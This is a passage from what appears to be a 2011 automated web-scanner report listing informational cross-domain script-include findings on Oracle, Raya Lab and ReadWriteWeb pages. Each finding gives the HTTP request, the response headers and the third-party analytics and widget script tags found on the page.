</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.293. http://www.oracle.com/us/support/contact-068555.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/contact-068555.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/support/contact-068555.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=40983856110748860,0:1)
Date: Tue, 06 Sep 2011 16:16:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 177425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.294. http://www.oracle.com/us/support/development-tools-080025.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/development-tools-080025.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/support/development-tools-080025.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41102547533795861,0:1)
Date: Tue, 06 Sep 2011 16:16:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.295. http://www.oracle.com/us/support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/support/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35974919222520039,0:1)
Date: Tue, 06 Sep 2011 16:16:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.296. http://www.oracle.com/us/support/lifetime-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/lifetime-support/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/support/lifetime-support/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41169372929955248,0:1)
Date: Tue, 06 Sep 2011 16:16:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.297. http://www.oracle.com/us/support/oracle-support-services-359636.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/oracle-support-services-359636.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/support/oracle-support-services-359636.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35762000514351306,0:1)
Date: Tue, 06 Sep 2011 16:16:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.298. http://www.oracle.com/us/support/policies/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/policies/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/support/policies/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41102757987196022,0:1)
Date: Tue, 06 Sep 2011 16:16:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.299. http://www.oracle.com/us/support/premier/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/premier/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/support/premier/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36011538114250090,0:1)
Date: Tue, 06 Sep 2011 16:16:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.300. http://www.oracle.com/us/support/support-integration/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/support-integration/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/support/support-integration/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36011692733074750,0:1)
Date: Tue, 06 Sep 2011 16:16:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.301. http://www.oracle.com/us/syndication/subscribe/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/syndication/subscribe/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/syndication/subscribe/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35763563882469969,0:1)
Date: Tue, 06 Sep 2011 16:16:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.302. http://www.oracle.com/us/technologies/cloud/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/technologies/cloud/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/technologies/cloud/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166220423677124,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.303. http://www.oracle.com/us/technologies/java/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/technologies/java/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/technologies/java/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=225;ecid=35761918909971729,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.304. http://www.oracle.com/us/technologies/virtualization/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/technologies/virtualization/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/technologies/virtualization/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=35997532225678913,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.305. http://www.oracleimg.com/us/assets/metrics/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracleimg.com
Path:   /us/assets/metrics/crossdomain.xml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/assets/metrics/crossdomain.xml HTTP/1.1
Host: www.oracleimg.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=23;ecid=41045686459875265,0:1)
Content-Length: 101820
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:12:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

20.306. http://www.rayalab.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rayalab.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?gclid=CMuoq_OIiasCFRligwodfwxd4w HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:36 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Sat, 19 Mar 2011 16:04:36 GMT
ETag: "152efb-1e857-49ed80d11d5a1"
Accept-Ranges: bytes
Content-Length: 125015
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Raya Cosmetic Manuf
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.307. http://www.rayalab.com/free_sample.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rayalab.com
Path:   /free_sample.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /free_sample.html HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.rayalab.com/?gclid=CMuoq_OIiasCFRligwodfwxd4w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=258269193.1974267751.1315345538.1315345538.1315345538.1; __utmb=258269193.1.10.1315345538; __utmc=258269193; __utmz=258269193.1315345538.1.1.utmgclid=CMuoq_OIiasCFRligwodfwxd4w|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:43 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 12 Aug 2009 02:39:57 GMT
ETag: "1889b3-4dcf-470e8bc1fda56"
Accept-Ranges: bytes
Content-Length: 19919
Content-Type: text/html
X-Pad: avoid browser bug

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</head>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

</script>
...[SNIP]...

20.308. http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.readwriteweb.com
Path:   /%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22 HTTP/1.1
Host: www.readwriteweb.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:32:49 GMT
Server: Apache/2.x (Hardened)
Last-Modified: Tue, 31 Aug 2010 16:17:53 GMT
ETag: "8f7c-48f20ec4c6e40"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 36732
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...
<link rel="start" href="http://www.readwriteweb.com/" title="Home" />


<script src="http://www.google.com/jsapi"></script>
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/readwrite'></script>
...[SNIP]...
<!-- Woopra Code Start -->
<script type="text/javascript" src="http://static.woopra.com/js/woopra.v2.js"></script>
...[SNIP]...
<!-- FM Leaderboard Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/637'></script>
...[SNIP]...
<!-- FM STAMP 970x66 expands 970x417 Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/2562'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js">

</script>
...[SNIP]...
<!-- FM Medium Rectangle - Right Zone -->
<script type='text/javascript'
src='http://static.fmpub.net/zone/1798'>
</script>
...[SNIP]...
</div>
<script type="text/javascript"
src="http://twitter.com/javascripts/blogger.js">
</script>
<script type="text/javascript"
src="http://twitter.com/statuses/user_timeline/rww.json?callback=twitterCallback2&amp;count=5">
</script>
...[SNIP]...
<!-- FM Custom for BizWeek Widget Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/2000'></script>
...[SNIP]...
<!-- FM Skyscraper Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/102'></script>
...[SNIP]...
<!-- FM Square Button Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/101'></script>
...[SNIP]...
</div>
<script type='text/javascript' src='http://static.fmpub.net/zone/636'></script>
...[SNIP]...
<!-- AddThis JS -->
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=readwriteweb"></script>
...[SNIP]...
</script>
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=H0arRY0" charset="utf-8"></script>
<script src="http://js-kit.com/comments-count.js"></script>
...[SNIP]...

20.309. http://www.readwriteweb.com/404.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.readwriteweb.com
Path:   /404.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /404.html HTTP/1.1
Host: www.readwriteweb.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0; __qca=P0-110430846-1315341155951; __qseg=Q_D; _fm_bizo=bizo%3Dindustry-business_services%2Clocation-texas%3B; PHPSESSID=uu8u8il3haqs9qituee6bsgku7

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:56 GMT
Server: Apache/2.x (Hardened)
Last-Modified: Tue, 31 Aug 2010 16:17:53 GMT
ETag: "8f7c-48f20ec4c6e40"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 36732
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...
<link rel="start" href="http://www.readwriteweb.com/" title="Home" />


<script src="http://www.google.com/jsapi"></script>
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/readwrite'></script>
...[SNIP]...
<!-- Woopra Code Start -->
<script type="text/javascript" src="http://static.woopra.com/js/woopra.v2.js"></script>
...[SNIP]...
<!-- FM Leaderboard Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/637'></script>
...[SNIP]...
<!-- FM STAMP 970x66 expands 970x417 Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/2562'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js">

</script>
...[SNIP]...
<!-- FM Medium Rectangle - Right Zone -->
<script type='text/javascript'
src='http://static.fmpub.net/zone/1798'>
</script>
...[SNIP]...
</div>
<script type="text/javascript"
src="http://twitter.com/javascripts/blogger.js">
</script>
<script type="text/javascript"
src="http://twitter.com/statuses/user_timeline/rww.json?callback=twitterCallback2&amp;count=5">
</script>
...[SNIP]...
<!-- FM Custom for BizWeek Widget Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/2000'></script>
...[SNIP]...
<!-- FM Skyscraper Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/102'></script>
...[SNIP]...
<!-- FM Square Button Zone -->
<script type='text/javascript' src='http://static.fmpub.net/zone/101'></script>
...[SNIP]...
</div>
<script type='text/javascript' src='http://static.fmpub.net/zone/636'></script>
...[SNIP]...
<!-- AddThis JS -->
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=readwriteweb"></script>
...[SNIP]...
</script>
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=H0arRY0" charset="utf-8"></script>
<script src="http://js-kit.com/comments-count.js"></script>
...[SNIP]...

20.310. http://www.readwriteweb.com/enterprise/2010/11/oracle.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.readwriteweb.com
Path:   /enterprise/2010/11/oracle.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /enterprise/2010/11/oracle.php HTTP/1.1
Host: www.readwriteweb.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:43 GMT
Server: Apache/2.x (Hardened)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 43029
Connection: close
Content-Type: text/html

